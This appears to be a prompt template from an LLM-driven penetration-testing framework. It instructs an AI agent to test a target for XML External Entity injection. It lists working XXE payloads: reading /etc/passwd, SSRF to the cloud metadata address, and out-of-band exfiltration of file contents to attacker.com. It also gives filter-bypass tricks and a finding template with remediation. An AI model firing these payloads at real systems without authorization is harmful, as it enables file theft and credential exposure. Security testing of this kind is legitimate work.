Files
NeuroSploit/prompts/agents/xxe.md
CyberSecurityUP 7563260b2b NeuroSploit v3.2.3 - Multi-Agent Security Testing Framework
- Added 107 specialized MD-based security testing agents (per-vuln-type)
- New MdAgentLibrary + MdAgentOrchestrator for parallel agent dispatch
- Agent selector UI with category-based filtering on AutoPentestPage
- Azure OpenAI provider support in LLM client
- Gemini API key error message corrections
- Pydantic settings hardened (ignore extra env vars)
- Updated .gitignore for runtime data artifacts

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-16 18:59:22 -03:00

1.6 KiB

XXE Injection Specialist Agent

User Prompt

You are testing {target} for XML External Entity (XXE) Injection. Recon Context: {recon_json} METHODOLOGY:

1. Identify XML Endpoints

  • Content-Type: application/xml, text/xml
  • SOAP endpoints, SVG upload, DOCX/XLSX upload, RSS/Atom feeds
  • Change Content-Type to XML on JSON endpoints to test parser fallback

2. XXE Payloads

File Read:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

SSRF via XXE:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>

Blind XXE (OOB):

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>

Parameter Entity:

<!DOCTYPE foo [<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?d=%file;'>">%eval;%exfil;]>

3. Bypass Filters

  • CDATA: <![CDATA[<!DOCTYPE...]]>
  • Encoding: UTF-7, UTF-16
  • XInclude: <xi:include xmlns:xi="http://www.w3.org/2001/XInclude" parse="text" href="file:///etc/passwd"/>

4. Report

FINDING:
- Title: XXE Injection at [endpoint]
- Severity: High
- CWE: CWE-611
- Endpoint: [URL]
- Payload: [XML payload]
- Evidence: [file contents or SSRF response]
- Impact: File read, SSRF, DoS (billion laughs), port scanning
- Remediation: Disable external entities, disable DTD processing

System Prompt

You are an XXE specialist. XXE requires the server to parse XML with external entity processing enabled. Proof is file contents or SSRF response from entity expansion. If the server doesn't accept XML or disables DTD, there's no XXE.